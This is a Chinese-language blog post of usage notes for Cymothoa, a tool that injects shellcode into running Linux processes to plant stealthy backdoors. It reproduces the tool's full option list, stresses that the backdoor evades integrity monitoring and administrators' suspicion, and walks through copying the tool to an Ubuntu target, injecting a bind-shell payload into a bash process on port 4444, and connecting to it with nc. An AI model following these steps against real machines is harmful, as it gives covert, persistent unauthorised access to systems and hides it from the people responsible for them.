Cymothoa后门工具

Cymothoa是一款隐秘的后门工具。

发现网上对于Cymothoa的文章并不是很多,可是Cymothoa又是一款非常强大的后门工具,这里记录下Cymothoa的使用笔记。

Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。

 

 

首先查看程序PID linux为ps -aux windows为tasklist

 

 

 

来看一下Cymothoa的参数选项:

 

 1                               _                 
 2                           _  | |                
 3   ____ _   _ ____   ___ _| |_| |__   ___  _____ 
 4  / ___) | | |    \ / _ (_   _)  _ \ / _ \(____ |
 5 ( (___| |_| | | | | |_| || |_| | | | |_| / ___ |
 6  \____)\__  |_|_|_|\___/  \__)_| |_|\___/\_____|
 7       (____/  
 8 Ver.1 (beta) - Runtime shellcode injection, for stealthy backdoors...
 9 
10 By codwizard (codwizard@gmail.com) and crossbower (crossbower@gmail.com)
11 from ES-Malaria by ElectronicSouls (http://www.0x4553.org).
12 
13 Usage:
14     cymothoa -p <pid> -s <shellcode_number> [options]
15 
16 Main options:
17     -p    process pid
18     -s    shellcode number
19     -l    memory region name for shellcode injection (default /lib/ld)
20           search for "r-xp" permissions, see /proc/pid/maps...
21     -m    memory region name for persistent memory (default /lib/ld)
22           search for "rw-p" permissions, see /proc/pid/maps...
23     -h    print this help screen
24     -S    list available shellcodes
25 
26 Injection options (overwrite payload flags):
27     -f    fork parent process
28     -F    don't fork parent process
29     -b    create payload thread (probably you need also -F)
30     -B    don't create payload thread
31     -w    pass persistent memory address
32     -W    don't pass persistent memory address
33     -a    use alarm scheduler
34     -A    don't use alarm scheduler
35     -t    use setitimer scheduler
36     -T    don't use setitimer scheduler
37 
38 Payload arguments:
39     -j    set timer (seconds)
40     -k    set timer (microseconds)
41     -x    set the IP
42     -y    set the port number
43     -r    set the port number 2
44     -z    set the username (4 bytes)
45     -o    set the password (8 bytes)
46     -c    set the script code (ex: "#!/bin/sh\nls; exit 0")
47           escape codes will not be interpreted...

 

ok 在例子之前看下Cymothoa工具在kali的位置:

 

也可以去https://sourceforge.net/projects/cymothoa/?stars=3 下载

在实战中你需要对目标机上传编译好的Cymothoa 进行后门注入。

例子中对kali下的Cymothoa打包 然后再Ubuntu18上进行运行。

===========================================================================================

攻击机kali上打包:

tar -cf cymothoa.tar cymothoa/

 

 

靶机Ubuntu18上解压:

tar xf  cymothoa.tar

 

 

 

 

 

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

 

注入bash进程植入Cymothoa后门:

 首先来看看最常用的-S 查看shellcode:

 

-s指定使用的shellcode -p指定注入的进程的pid -y指定payload的服务端口

也可以查看bash进程

ps a|grep /bin/bash

查看进程id,一般来说都会选择bash的进程,选择这个pid为2211的bash进程

./cymothoa -s 0 -p 2211 -y 4444

 

注入成功以后 用nc之类的工具连接这个端口(例子中为4444)即可访问后门。

 

posted @ 2019-03-12 20:17  卿先生  阅读(2018)  评论(0编辑  收藏  举报